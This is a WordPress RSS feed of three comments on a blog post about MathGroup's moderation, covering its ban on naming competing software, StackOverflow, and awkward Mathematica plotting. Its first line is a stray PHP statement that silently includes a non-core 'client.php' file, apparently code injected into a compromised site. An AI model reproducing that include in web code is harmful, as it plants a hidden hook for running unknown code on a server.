@include( ABSPATH . WPINC . '/client.php');<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: That-Which-Must-Not-Be-Named (on Mathgroup)</title>
	<atom:link href="http://dnquark.com/blog/2009/11/that-which-must-not-be-named-on-mathgroup/feed/" rel="self" type="application/rss+xml" />
	<link>http://dnquark.com/blog/2009/11/that-which-must-not-be-named-on-mathgroup/</link>
	<description>Threads both sad and humoristic / небрежный плод моих забав ...</description>
	<lastBuildDate>Mon, 17 Sep 2012 08:06:41 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: dnquark</title>
		<link>http://dnquark.com/blog/2009/11/that-which-must-not-be-named-on-mathgroup/comment-page-1/#comment-267</link>
		<dc:creator>dnquark</dc:creator>
		<pubDate>Thu, 12 Jan 2012 08:06:39 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=85#comment-267</guid>
		<description>1. I appreciate Steven Christensen&#039;s efforts, and I&#039;m willing to believe his contribution elevated the quality of discussion on Mathgroup back in the day.  But today, such moderation just strikes one as odd, particularly because the target audience here is extremely highly educated, (hopefully) mature, and are quite capable of conducting themselves nicely.  Experiencing mid-1990s style moderation in the year 2011 is very strange.  (Of course, the entire smc.vnet.net domain is a blast from the past, so maybe it&#039;s all part of an immersive experience to make me feel nostalgic about the olden days of 486s and 14.4kbps modems).

2. SO is awesome.  I&#039;m on it.  Furthermore, it is another reason for why moderation on Mathgroup is completely unnecessary: newbies can get their questions answered on SO, while the more sophisticated crowd can engage with Mathgroup luminaries. 

3. Yes, having plots be very general is, in principle, desirable. Unfortunately, without a good interface (something akin to what Matlab provides) this generality is useless.  I recently spent a whole day (!) reformatting a single plot to prepare it for publication.  Manually changing line styles and fonts by constructing complex pattern-based replacement expressions, but that was the easy part.  MMA PDF export is spectacularly bad: it&#039;s anything but WYSIWYG and requires much trial and error to get right.  Next time I&#039;m doing this in Inkscape.</description>
		<content:encoded><![CDATA[<p>1. I appreciate Steven Christensen's efforts, and I'm willing to believe his contribution elevated the quality of discussion on Mathgroup back in the day.  But today, such moderation just strikes one as odd, particularly because the target audience here is extremely highly educated, (hopefully) mature, and are quite capable of conducting themselves nicely.  Experiencing mid-1990s style moderation in the year 2011 is very strange.  (Of course, the entire smc.vnet.net domain is a blast from the past, so maybe it's all part of an immersive experience to make me feel nostalgic about the olden days of 486s and 14.4kbps modems).</p>
<p>2. SO is awesome.  I'm on it.  Furthermore, it is another reason for why moderation on Mathgroup is completely unnecessary: newbies can get their questions answered on SO, while the more sophisticated crowd can engage with Mathgroup luminaries. </p>
<p>3. Yes, having plots be very general is, in principle, desirable. Unfortunately, without a good interface (something akin to what Matlab provides) this generality is useless.  I recently spent a whole day (!) reformatting a single plot to prepare it for publication.  Manually changing line styles and fonts by constructing complex pattern-based replacement expressions, but that was the easy part.  MMA PDF export is spectacularly bad: it's anything but WYSIWYG and requires much trial and error to get right.  Next time I'm doing this in Inkscape.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: telefunkenvf14</title>
		<link>http://dnquark.com/blog/2009/11/that-which-must-not-be-named-on-mathgroup/comment-page-1/#comment-266</link>
		<dc:creator>telefunkenvf14</dc:creator>
		<pubDate>Sat, 21 May 2011 08:47:22 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=85#comment-266</guid>
		<description>I stumbled across your blog while searching for something else... Anyways, two comments about MathGroup:

1. MathGroup is moderated by a single guy, and he isn&#039;t paid to do it. Yikes. I&#039;ve also had references to other CAS systems and Matlab censored --- and received an email explaining why, which was nice. Basically, past flame wars lead the volunteer moderator to adopt the do-not-mention policy. Annoying, but I understand the time and energy this must save him.

2. You should join StackOverflow.com, if you haven&#039;t already done so. It is a much better/faster place to get MMA help, and the site is set up to publicly reward the best answers, good questions, and useful comments with reputation points.

One final thought, about plotting in MMA, which you mentioned in another post...

I agree that it can be a PITA sometimes to get things to look right, but plotting functions seem to fit the MMA design pattern of &#039;make things as general as possible&#039;. Hopefully things will continue to improve---as I&#039;m sure they will---given that all the Wolfram&#124;Alpha plots are produced by Mathematica in the background (and they look great, IMO). 

If you&#039;ve upgraded to version 8, you might try using the link to Wolfram&#124;Alpha; send it your data, have it generate the plot, and then just grab that &#039;pod&#039; of W&#124;A output.

The Demonstrations Project is also good source of plot customization code and examples.

GIMP (open source) alternative to Photoshop may also be able to handle the necessary post processing, if you&#039;re sick of trying to code perfection in MMA.

:)</description>
		<content:encoded><![CDATA[<p>I stumbled across your blog while searching for something else... Anyways, two comments about MathGroup:</p>
<p>1. MathGroup is moderated by a single guy, and he isn't paid to do it. Yikes. I've also had references to other CAS systems and Matlab censored --- and received an email explaining why, which was nice. Basically, past flame wars lead the volunteer moderator to adopt the do-not-mention policy. Annoying, but I understand the time and energy this must save him.</p>
<p>2. You should join StackOverflow.com, if you haven't already done so. It is a much better/faster place to get MMA help, and the site is set up to publicly reward the best answers, good questions, and useful comments with reputation points.</p>
<p>One final thought, about plotting in MMA, which you mentioned in another post...</p>
<p>I agree that it can be a PITA sometimes to get things to look right, but plotting functions seem to fit the MMA design pattern of 'make things as general as possible'. Hopefully things will continue to improve---as I'm sure they will---given that all the Wolfram|Alpha plots are produced by Mathematica in the background (and they look great, IMO). </p>
<p>If you've upgraded to version 8, you might try using the link to Wolfram|Alpha; send it your data, have it generate the plot, and then just grab that 'pod' of W|A output.</p>
<p>The Demonstrations Project is also good source of plot customization code and examples.</p>
<p>GIMP (open source) alternative to Photoshop may also be able to handle the necessary post processing, if you're sick of trying to code perfection in MMA.</p>
<p>:)</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Yaroslav Bulatov</title>
		<link>http://dnquark.com/blog/2009/11/that-which-must-not-be-named-on-mathgroup/comment-page-1/#comment-264</link>
		<dc:creator>Yaroslav Bulatov</dc:creator>
		<pubDate>Wed, 02 Mar 2011 08:56:38 +0000</pubDate>
		<guid isPermaLink="false">http://www.dnquark.com/blog/?p=85#comment-264</guid>
		<description>&quot;No mentions of competing products&quot; is part of Mathgroup moderation policy. It can be hard to tell what is a competing product, last time my message was censored for mentioning &quot;GAP&quot;. A couple of times I posted a message and it didn&#039;t make it to the list at all, apparently couple of other users had same problem</description>
		<content:encoded><![CDATA[<p>"No mentions of competing products" is part of Mathgroup moderation policy. It can be hard to tell what is a competing product, last time my message was censored for mentioning "GAP". A couple of times I posted a message and it didn't make it to the list at all, apparently couple of other users had same problem</p>
]]></content:encoded>
	</item>
</channel>
</rss>
